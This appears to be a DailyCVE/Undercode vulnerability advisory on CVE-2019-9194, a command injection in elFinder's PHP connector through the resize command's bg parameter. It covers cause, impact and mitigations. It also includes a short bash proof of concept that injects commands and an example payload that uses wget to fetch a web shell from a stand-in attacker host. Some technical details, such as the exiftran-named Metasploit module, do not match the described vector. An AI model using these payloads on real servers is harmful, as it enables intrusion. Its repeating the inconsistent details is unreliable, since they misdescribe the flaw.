elFinder, Command Injection, CVE-2019-9194 (Critical)

Listen to this Post

How the CVE Works (Approx. 20 lines):

  1. Vulnerable Component: The PHP connector of elFinder versions prior to 2.1.48.
  2. Trigger Command: The `resize` command, which includes image rotation functionality.
  3. Vulnerable Parameter: The `bg` (background color) parameter, which is accepted from user input.
  4. Backend Dependency: The vulnerability is exploitable when the application uses the ImageMagick CLI backend for image processing.
  5. Lack of Sanitization: The user-supplied `bg` value is incorporated directly into shell command strings without proper escaping or validation.
  6. Shell Command Construction: The unsanitized value is passed to functions like proExec, which executes system commands.
  7. Command Injection: An attacker can inject shell metacharacters (e.g., ;, |, &, $()) into the `bg` parameter.
  8. Arbitrary Command Execution: When the `resize` command is processed, the injected metacharacters break out of the intended command structure, allowing the attacker to execute arbitrary OS commands.
  9. Privilege Context: The injected commands run with the privileges of the web server process (e.g., www-data).
  10. Attack Vector: The attacker sends a crafted HTTP request to the elFinder PHP connector (e.g., connector.minimal.php).
  11. Example Request Parameters: The malicious request includes parameters like cmd=resize, target=<file_hash>, and bg=red; id > /tmp/out.
  12. Code Flow: The request reaches the `imgRotate` method in elFinderVolumeDriver.class.php, where the unsanitized `bg` value is concatenated into the command array.
  13. Command Execution: The constructed command is then passed to the shell via proExec, leading to execution of the injected commands.
  14. Impact on System: The attacker can read, write, delete files, or install backdoors, effectively compromising the server.
  15. Unauthenticated Access: The PHP connector is accessible without authentication in many configurations, making the vulnerability easy to exploit.
  16. Patch Analysis: The fix in version 2.1.48 involves strict input validation (allowlist) and proper escaping of the `bg` parameter before shell command construction.
  17. Proof of Concept: Public exploits (e.g., Metasploit module exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection) demonstrate the vulnerability.
  18. CVE Details: CVE-2019-9194 was disclosed on February 26, 2019, with a CVSS score of 9.8 (Critical).
  19. Affected Versions: All elFinder versions before 2.1.48 are vulnerable.
  20. Mitigation: Upgrade to elFinder version 2.1.48 or later, or disable the `resize` command and avoid using the ImageMagick CLI backend.

DailyCVE Form:

Platform: elFinder PHP connector
Version: before 2.1.48
Vulnerability: Command Injection (RCE)
Severity: High (CVSS 9.8)
Date: 2019-02-26

Prediction: Patch by 2019-03-01

What Undercode Say:

Analytics: The vulnerability is triggered by unsanitized input in the `resize` command’s `bg` parameter, leading to arbitrary command execution. Attackers can easily exploit this without authentication.

Bash Commands and Codes (Example Exploit Snippet):

!/bin/bash
Simple PoC for CVE-2019-9194
Upload a malicious file and trigger the resize command
TARGET="http://target.com/elfinder/php/connector.minimal.php"
HASH=$(curl -s -F "upload[][email protected]" "$TARGET?cmd=upload" | jq -r '.added[bash].hash')
curl -s "$TARGET?cmd=resize&target=$HASH&bg=red; id > /tmp/out"

How Exploit:

An attacker uploads an image with a crafted filename (or uses the `bg` parameter directly). The unsanitized value is concatenated into a shell command, allowing injection of arbitrary commands. For example, `bg=red; wget http://attacker.com/shell -O /tmp/shell.php` would download a web shell.

Protection from this CVE:

1. Upgrade to elFinder version 2.1.48 or later.

2. Disable the `resize` command if not required.

  1. Avoid using the ImageMagick CLI backend; use the GD library instead.
  2. Restrict access to the PHP connector to trusted IP addresses.
  3. Use a Web Application Firewall (WAF) to filter malicious input.

Impact:

  • Confidentiality: An attacker can read sensitive files (e.g., configuration files, database credentials).
  • Integrity: An attacker can modify or delete files, deface websites, or upload malicious content.
  • Availability: An attacker can disrupt services by deleting critical files or overloading the server.
  • Privilege Escalation: The attacker can gain a foothold on the server and potentially escalate privileges to root.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top